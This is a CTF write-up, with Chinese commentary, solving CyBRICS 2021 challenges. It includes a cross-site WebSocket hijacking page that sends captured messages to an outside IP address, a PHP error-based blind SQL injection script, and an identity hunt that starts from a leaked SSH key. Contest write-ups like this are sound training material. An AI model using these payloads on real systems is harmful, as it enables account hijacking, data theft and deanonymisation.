7th XCTF & CyBRICS CTF 2021
Web
Ad Network
Author: Alexander Menshchikov (@n0str)
We are so tired of advertising on the internet. It feels like it breaks the internet. Try to follow the ad, try to follow its rules.
There is a flag 1337 redirects deep into the network...
/adnetwork 下有重定向,次数大概为 1337 次,构造出如下脚本来获得 flag。
<?php
use GuzzleHttp\Client;
require '../vendor/autoload.php';
$URL = "http://adnetwork-cybrics2021.ctf.su/adnetwork";
$client = new Client(array(
"timeout" => 15,
"allow_redirects" => false,
"verify" => false
));
for($i = 0; $i < 1338; $i++){
try{
$response = $client->get($URL, array(
'proxy' => array(
'http' => '127.0.0.1:7890',
'https' => '127.0.0.1:7890'
)
));
}catch(Exception $e){
echo "[i--] $e";
$i--;
continue;
}
$content = $response->getBody()->getContents();
$URL = str_replace("\">See Other</a>.\n\n", "", str_replace("<a href=\"", "", $content));
echo "[$i] " . $URL . PHP_EOL;
echo $content . PHP_EOL;
}
cybrics{f0lL0w_RUl3Z_F0ll0W_r3d1r3C7z}
Multichat
Author: Alexander Menshchikov (@n0str)
Yet another chat-messenger with rooms support! Free to use. Convince the admin that its code is insecure.
Tip: Admin and tech support are members of a secret chat room. Tech support can ask admin to tell him the flag, to do that tech support writes him a message (in a chat): "
Hey, i forgot the flag. Can you remind me?". Then admin will tell him the flag.
基于 WebSocket 的聊天室,根据题目描述,只需要技术员向管理员发送指定字符串即可接收到 flag。在 5000 端口给了一个上报 URL 的页面。因此,只需要构建一个前端页面进行 CSRF 即可。
<!DOCTYPE html>
<html>
<body>
<script>
const socket = new WebSocket("ws://multichat-cybrics2021.ctf.su/ws");
socket.onopen = function(e){
socket.send("Hey, i forgot the flag. Can you remind me?");
}
socket.onmessage = function(e){
var exportFlag = new XMLHttpRequest();
exportFlag.open('get', 'http://8.136.8.210:3255/flagis-' + window.btoa(e.data));
exportFlag.send();
}
</script>
</body>
</html>
将页面放在自己的服务器上,提交给靶机,可在监听的端口处得到如下响应。
将其中带出的信息解码可得如下内容。
Sure, dude. The flag is cybrics{Pwn3d_CR055_51t3_W3850CK3t_h1jACK1n9}
cybrics{Pwn3d_CR055_51t3_W3850CK3t_h1jACK1n9}
Announcement
Author: Alexander Menshchikov (@n0str)
Ladies and gentlemen!
Allow us to introduce a brand new project — ⚐ The Flag
在提交的参数中 SQL 注入,其中 digest 参数的值需为 email 的 MD5。
写脚本构造报错逻辑进行盲注。
<?php
use GuzzleHttp\Client;
require '../vendor/autoload.php';
$URL = "http://announcement-cybrics2021.ctf.su/";
//$statement = "select database()"; //announcement
//$statement = "select group_concat(table_name) from information_schema.tables where table_schema=database()"; //emails,logs
//$statement = "select group_concat(column_name) from information_schema.columns where table_schema=database()"; //email,id,timestamp,log
$statement = "select group_concat(log) from announcement.logs"; //flag
$text = "";
$client = new Client(array(
"timeout" => 5,
"allow_redirects" => false,
"verify" => false
));
for($count = 1; $count <= 100; $count++){
$low = 32;
$high = 126;
while($low <= $high){
$mid = (int)(($low + $high) / 2);
$sql = "' or if((ascii(substr(({$statement}),{$count},1)) > {$mid}),1,cot(0)), NOW()) #";
$response = $client->post($URL, array(
'proxy' => array(
'http' => '127.0.0.1:7890',
'https' => '127.0.0.1:7890'
),
'form_params' => array(
"email" => $sql,
"digest" => md5($sql)
)
));
$content = $response->getBody()->getContents();
if(stristr($content, "cot")){
$high = $mid - 1;
}else{
$low = $mid + 1;
}
}
echo $count . PHP_EOL;
$text .= chr((int)(($high + $low + 1) / 2));
echo $text . PHP_EOL;
}
cybrics{1N53r7_0ld_900d_5ql}
Cyber
Mic Check
cybrics{Th1S_i5_T3h_R34l_m1C_ch3CK_f1A6}
rebyC
Scanner
Author: Mikhail Driagunov (@aethereternity)
Check out this cool new game!
I heard they serve flags at level 5.
依次解出前四个简单关卡。第五关给了一个滚动的二维码。先使用 GIF Splitter 抽帧分离,再写个脚本将其还原出来。
from PIL import Image
ny = 0
newImage = Image.new("RGB", (989, 162), "white")
for x in range(8, 145, 3):
print("./gif/IMG00%03d.bmp" % x)
image = Image.open(("./gif/IMG00%03d.bmp" % x))
slice = image.crop((46, 496, 1036, 502))
newImage.paste(slice, (0, ny))
ny += 6
newImage = newImage.resize((500, 500))
newImage.save("this.png")
扫描二维码可得 flag。
cybrics{N0w_Y0u_4r3_4_c4sh13r_LOL}
CAPTCHA The Flag
Author: Vlad Roskov (@mrvos)
Guessing challenges? On my CyBRICS? It’s more likely than you think.
Prove you’re a true CTFer!
填写验证码的小游戏,要分解颜色才能看见验证码。构造如下交互式脚本来解决问题。
import httpx as requests
import numpy as np
from PIL import Image
# bit planes codes are from https://medium.com/@stephanie.werli/image-steganography-with-python-83381475da57
# Interactive Script
session = requests.Client(proxies={
"http://": "http://127.0.0.1:7890",
"https://": "http://127.0.0.1:7890",
})
while True:
image = session.get("https://captf-cybrics2021.ctf.su/captcha.php").content
file = open("./tmp.png", "wb")
file.write(image)
file.close()
data = np.array(Image.open("./tmp.png", "r"))
out = []
for k in range(7, -1, -1):
res = data // 2 ** k & 1
out.append(res * 255)
b = np.hstack(out)
Image.fromarray(b).show()
captcha = input("Enter the captcha you have seen in the window:")
try:
response = session.post("https://captf-cybrics2021.ctf.su/", data={"answer": f"{captcha}"})
except:
print(f"[*] Hand up failed.")
continue
print(f"[+] Handed up {captcha} with response {response.content.decode()}")
cybrics{a_k33n_Ey3_wi11_sp0T_r1GhT_aw4Y}
Network
LX-100
Author: Vlad Roskov (@mrvos)
We were sitting at an SPbCTF meetup and tried to sniff some Wi-Fi traffic. Lol imagine, they have a DSLR camera that can broadcast a Wi-Fi access point.
Anyway, we were discussing CyBRICS flags there, hope there’s no way to leak them.
Wireshark 打开流量包,跟踪 UDP 流到 4 可以得到一份 MJPEG 视频流。将其导出后修正拓展名为 MJPEG,使用 VLC Media Player 播放可得如下包含 flag 的图片。
cybrics{Lost_Secrets_In_The_Air}
ASCII Terminal
Author: Artur Khanov (@awengar)
you have an ASCII terminal. It really works, check with the
idcommand
把字符画当作指令来执行的终端,字符画长度为 30 行,以 . 单独做一行结束。
用 PowerPoint 做出如下图片,然后使用上述网站生成字符画,然后稍作处理得到如下载荷,因为 l 时常被误认,所以将其去除了,同时因为有相当部分字符不允许被使用,这里使用了纯星号和点替换生成的字符画中的字符。
...............................................................................................................................................................................
...............................................................................................................................................................................
...............................................................................................................................................................................
...............................................................................................................................................................................
...............................................................................................................................................................................
...............................................................................................................................................................................
...............................................................................................................................***::::**..............***......................
........................................................................*.*..................................................************............****......................
......................................................................:****................................................**************.......:*....***.....**...............
......................................................................*****...............................................******...............****:*.***..******..............
......................................................................*****...............................................*****...............*******************..............
......................:***********........*************:*.......*********************.....................................*****...................*:*******:*..................
..................*:**************........*****************.....*********************..............................*********************.......*****************...............
..................******:.....*:*:........*****..**..******......********************..............................**********************......******************..............
.................******................................*****..........*****........................................*********************.......:***...***...****...............
................*****...........................***********...........*****...............................................*****......................****......................
...............******.......................***************...........*****...............................................*****......................****......................
...............******.....................*****************...........*****...............................................*****................................................
................****:...................******.........****...........*****...............................................*****................................................
................******..................*****..........****...........*****...............................................*****................................................
.................******:.******.:*......*****:**.**.*******...........******.********.....................................*****................................................
..................:***************.......******************............**************.....................................*****................................................
.....................************..........**********..:****............*:***********.....................................****:................................................
...............................................*...............................................................................................................................
...............................................................................................................................................................................
...............................................................................................................................................................................
...............................................................................................................................................................................
...............................................................................................................................................................................
...............................................................................................................................................................................
...............................................................................................................................................................................
.
将载荷发送后可得到如下响应。
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
..........................%@,...............%@,.......................+#@;?@@@@@@@@@@#..,?@@#*.....?@@@@@@%...?@@@@@@%...,?@@#*....*@@@@@@@#%:........?@;......:?#@@$+...,@@@@@@@@@;................,@*.....?@@@@@@%................:*$@@#%;......,*#@#*.....,*#@#*....*@@@@@@#?:...?@$:................................................................................................................................................................................................................................................
..........................%@,...............%@,......................,@@@;?@@@@@@@@@@#.,#@@@@@%....$@@@@@@%...$@@@@@@%..,#@@@@@%...*@@@@@@@@@@:......:@@;.....?@@@@@@@%..,@@@@@@@@@:...............,$@*.....$@@@@@@%...............+@@@@@@@@?.....%@@@@@%....%@@@@@%...*@@@@@@@@@;..?@@$................................................................................................................................................................................................................................................
..........................%@,........................................+@?,......#@,.....*@%:,;@@;...@#.........@#........*@%:,;@@;..*@*....,;$@$.....,#@@;....*@@*:,,+@@?........*@?...............,$@@*.....@#....................;@@%;,,:*@@+...;@#;,;#@;..;@#;,;#@;..*@*...,:%@@:..,#@................................................................................................................................................................................................................................................
..........................%@,........................................*@;.......#@,.....#@,...+@*..,@%........,@%........#@,...+@*..*@*......,@@.....*@$@;...:@@;.....:@@,......:@$...............+@@$@*....,@%...................,@@*......;@$...%@;...;@%..%@;...;@%..*@*......%@%...?@,...............................................................................................................................................................................................................................................
.......,?#@#*..*@+....,@%.%@,?@@%:...%#:#@%.%@,..,?#@#*....*#@@$;....*@;.......#@,...........*@+..;@*........;@*..............*@+..*@*......,@@....:@??@;...?@?.......?%:......$@;...............##;;@*....;@*...................+@$........?*...@@.....@@..@@.....@@..*@*......,@@...?@,...............................................................................................................................................................................................................................................
......,#@@@@@?.,@$....*@;.%@%@@@@@:..%##@@?.%@,.,#@@@@@?..?@@@@@@;...*@:.......#@,.........,+@#,..*@*%@@%:...*@*%@@%:.......,+@#,..*@*....,;$@%....$#,?@;...$@:...............+@%................;..;@*....*@*%@@%:..............%@+............,@$.....$@,,@$.....$@,.*@*.......$@:..?@:...............................................................................................................................................................................................................................................
......?@$;,;#@:.$@,...$@..%@@+,:$@%..%@#:...%@,.?@$;,;#@:,@#:,,+@$...?@:.......#@,........?@@#:...?@@@@@@@:..?@@@@@@@:.....?@@#:...*@@@@@@@@@@:...*@;.?@;...@@,...............#@:...................;@*....?@@@@@@@:.............#@,............,@%.....%@:,@%.....%@:.*@*.......%@;..*@;...............................................................................................................................................................................................................................................
......@@,...;@*.+@*..,@?..%@+...,@@,.%@+....%@,.@@,...;@*,@#;.......;@#........#@,........?#@@#:..$@*,,:$@#..$@*,,:$@#.....?#@@#:..*@@@@@@@#?:...:@%..?@;...@@...............;@%....................;@*....$@*,,:$@#.............@@,....$@@@@@;.:@%.....%@::@%.....%@:.*@*.......?@+..:@$:..............................................................................................................................................................................................................................................
.....:@$........,@#..*@;..%@,....%@;.%@:....%@,:@$........$@@@$*,..*@#:........#@,..........,?@$........,#@:.......,#@:......,?@$..*@*..,?@%,....$#,..?@;...#@,..............%@;....................;@*..........,#@:............#@,....$@@@@@;.:@%.....%@,:@%.....%@,.*@*.......%@;...+@@,.............................................................................................................................................................................................................................................
.....:@%.........%@:.$#...%@.....?@;.%@,....%@,:@%........,%@@@@@+.*@$:........#@,............#@,........%@;........%@;........#@,.*@*....?@%...*@;...?@;...$@;.......:;,...,@#.....................;@*...........%@;............$@;........?@;.,@$.....$@,,@$.....$@,.*@*.......#@:...+@@,.............................................................................................................................................................................................................................................
.....:@$.........;@*,@?...%@,....%@:.%@,....%@,:@$..........,+%#@@,.;@$........#@,............$@:........%@;........%@;........$@:.*@*....,#@*..$@@@@@@@@@:.*@?.......?@*...;@?.....................;@*...........%@;............+@%........?@;..@@.....@@..@@.....@@..*@*......,@@...,@#:..............................................................................................................................................................................................................................................
......@@,...,@%...##*@:...%@;...,@@,.%@,....%@,.@@,...,@%.......$@:..%@,.......#@,....,@#....,@@,,@#....,@@,,@#....,@@,,@#....,@@,.*@*.....;@@:.$@@@@@@@@@:.:@@:.....;@@:...?@;.....................;@*...,@#....,@@,............,@@*.......%@;..%@;...;@%..%@;...;@%..*@*......%@?...+@;...............................................................................................................................................................................................................................................
......%@$:,:$@+...*@@#....%@@;,:$@%..%@,....%@,.%@$:,:$@+:@$:,,;#@,..*@:.......#@,.....$@%:,;$@%..$@%:,;$@%..$@%:,;$@%..$@%:,;$@%..*@*......%@%.......?@;....?@@*:,:*@@?....$@,.....................;@*....$@%:,;$@%..............;@@%;,,:+#@@;..;@#;,;#@;..;@#;,;#@;..*@*...,;%@@:...?@:...............................................................................................................................................................................................................................................
......,#@@@@@%....,@@*....%@%@@@@#,..%@,....%@,.,#@@@@@%..%@@@@@@?...*@;.......#@,.....:@@@@@@#,..:@@@@@@#,..:@@@@@@#,..:@@@@@@#,..*@*......,@@;......?@;.....%@@@@@@@%,....@@......................;@*....:@@@@@@#,...............+@@@@@@@@#;....%@@@@@%....%@@@@@%...*@@@@@@@@@;....?@,...............................................................................................................................................................................................................................................
.......,?#@#?,.....#@:....%@,%@@%,...%@,....%@,..,?#@#?,..,*#@@$+....*@;.......#@,......:%@@#?,....:%@@#?,....:%@@#?,....:%@@#?,...*@*.......*@#,.....?@;......;%#@@$+......@#......................;@*.....:%@@#?,.................,*$@@#%+......,*#@#*,....,*#@#*,...*@@@@@@#?:.....?@,...............................................................................................................................................................................................................................................
..................,@$................................................+@;..............................................................................................................................................................................................................?@,...............................................................................................................................................................................................................................................
................,,%@+................................................;@?,............................................................................................................................................................................................................,#@................................................................................................................................................................................................................................................
................#@@#.................................................,@@@;.........................................................................................................;@@@@@@@@@@@+....................;@@@@@@@@@@@+...................................................?@@%................................................................................................................................................................................................................................................
................%@$,..................................................+#@;.........................................................................................................;@@@@@@@@@@@+....................;@@@@@@@@@@@+...................................................?@$,................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
cybrics{T3553R4C7_15_G00D}
Forensic
Namecheck
Author: Alexander Menshchikov (@n0str)
We have got the home folder from a criminal’s computer. Try to find his/her real name.
Flag format in uppercase: LASTNAME FIRSTNAME (ex: IVANOV IVAN)
附件中有一份 Bash history。
git add *
git commit -m "instagram filter"
git push origin main
rm *
ls -la
rm -rf .git
.ssh 文件夹中还有一份私钥,因此尝试使用这个私钥去连接 GitHub,可以得到如下响应。
PTY allocation request failed on channel 0
Hi poggersdog12! You've successfully authenticated, but GitHub does not provide shell access.
Connection to github.com closed.
因此得到了此人的 GitHub ID poggersdog12。
使用上述参考 GraphQL 语句略作修改可以查出一个 email vividcoala@localhost.com。
根据前面的 commit 信息可知有一个 Instagram,因此尝试访问 vividcoala 的 Instagram,在 filter 中可以发现一张机票,使用 Read My Boarding Pass 扫描可得如下内容。
DIVOV NIKOLAI
Recording
Author: Mikhail Driagunov (@aethereternity)
I’ve found a strange recording.
What does it hide?
使用 Macro Recorder 打开 MRF 文件。将系统的语言和 Firefox 的语言调整为英语,此时窗口标题才能跟记录中的对照上。按照 Firefox 的位置将开始菜单的磁贴摆放好,并在 Firefox 中构造一个 pastebin 的锁定记录的页面。
新建一个记录按照原本记录中的窗口大小设置,然后播放记录,此时屏幕键盘的窗口大小和位置将被调整到预设位置。
将鼠标的点击关掉,播放提供的记录,将两遍虚拟键盘的记录路径对应键位得到输入内容。补充后可以得到下列内容。
https://pastebin.com/uzqCjFUa
9yDz5iZprd
使用密码解密 Pastebin 后可得 flag。
cybrics{m4cr0_rulz_w000t}